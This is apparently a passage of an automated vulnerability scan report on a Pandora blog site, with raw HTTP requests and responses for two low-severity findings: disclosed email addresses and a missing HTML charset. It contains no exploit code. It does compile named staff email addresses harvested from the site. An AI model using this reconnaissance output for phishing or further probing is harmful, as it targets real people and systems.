HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:51 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT ETag: "888014-726a-4990aa235cc40" Accept-Ranges: bytes Content-Length: 29290 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>@maurice -- it sounds like you're trying to listen on an in-the-home device. Please write to pandora-support@pandora.com for quick assistance with any technical issues.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:53 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT ETag: "888015-38f6-4990aa235cc40" Accept-Ranges: bytes Content-Length: 14582 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email addresses were disclosed in the response:
event@pandora.com
pandora-support@pandora.com
tim.westergren@pandora.com
tour@pandora.com
Request
GET /pandora/archives/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:21 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT ETag: "7cc4ae-c72a-49881a26b8080" Accept-Ranges: bytes Content-Length: 50986 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="http://">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <strong>tim.westergren@pandora.com</strong> ...[SNIP]... <p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT ETag: "7cc4f1-596e-49881a27ac2c0" Accept-Ranges: bytes Content-Length: 22894 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... <br /> RSVP: tour@pandora.com</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT ETag: "7cc5de-5b9d-49881a23db9c0" Accept-Ranges: bytes Content-Length: 23453 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email addresses were disclosed in the response:
timinny@pandora.com
tour@pandora.com
Request
GET /pandora/archives/new-york/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:29 GMT ETag: "410001-82b3-49881a25c3e40" Accept-Ranges: bytes Content-Length: 33459 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <strong>timinny@pandora.com</strong> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/north-carolina/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT ETag: "408001-48e2-49881a23db9c0" Accept-Ranges: bytes Content-Length: 18658 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/pennsylvania/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT ETag: "7cc3b0-5fee-49881a27ac2c0" Accept-Ranges: bytes Content-Length: 24558 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT ETag: "7cc3a8-8e62-49881a24cfc00" Accept-Ranges: bytes Content-Length: 36450 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT ETag: "7cc4df-5ed2-49881a24cfc00" Accept-Ranges: bytes Content-Length: 24274 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com </a> ...[SNIP]... the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]... <strong>tour@pandora.com</strong> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/washington-dc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT ETag: "7ce1d4-4d1d-49881a24cfc00" Accept-Ranges: bytes Content-Length: 19741 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:45 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Tue, 04 Jan 2011 19:55:55 GMT ETag: "79e602-8883-4990aa80d28c0" Accept-Ranges: bytes Content-Length: 34947 Connection: close Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?> <rss version="2.0"> <channel> <title>Pandora</title> <link>http://blog.pandora.com/pandora/</link> <description></description> <language>en</language> <copyright ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]...
The following email address was disclosed in the response:
brandon.aaron@gmail.com
Request
GET /pandora/jquery.dimension.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:23:48 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 23 May 2007 04:44:32 GMT ETag: "5cc023-25da-4311bd27b0c00" Accept-Ranges: bytes Content-Length: 9690 Content-Type: application/javascript
/* * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * * $LastChangedDate$ * $Rev$ */ ...[SNIP]... the chain. If passed in the * chain will not be broken and the result will be assigned to this object. * @type Object * @cat Plugins/Dimensions * @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) */ jQuery.fn.offset = function(options, returnObject) { var x = 0, y = 0, elem = this[0], parent = this[0], sl = 0, st = 0, options = jQuery.extend({ margin: true, border ...[SNIP]...
5. HTML does not specify charsetprevious There are 4 instances of this issue:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /pandora/assets_c/2010/11/North HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 313
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/North was not found on thi ...[SNIP]...
GET /pandora/assets_c/2010/11/sd HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 310
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sd was not found on this s ...[SNIP]...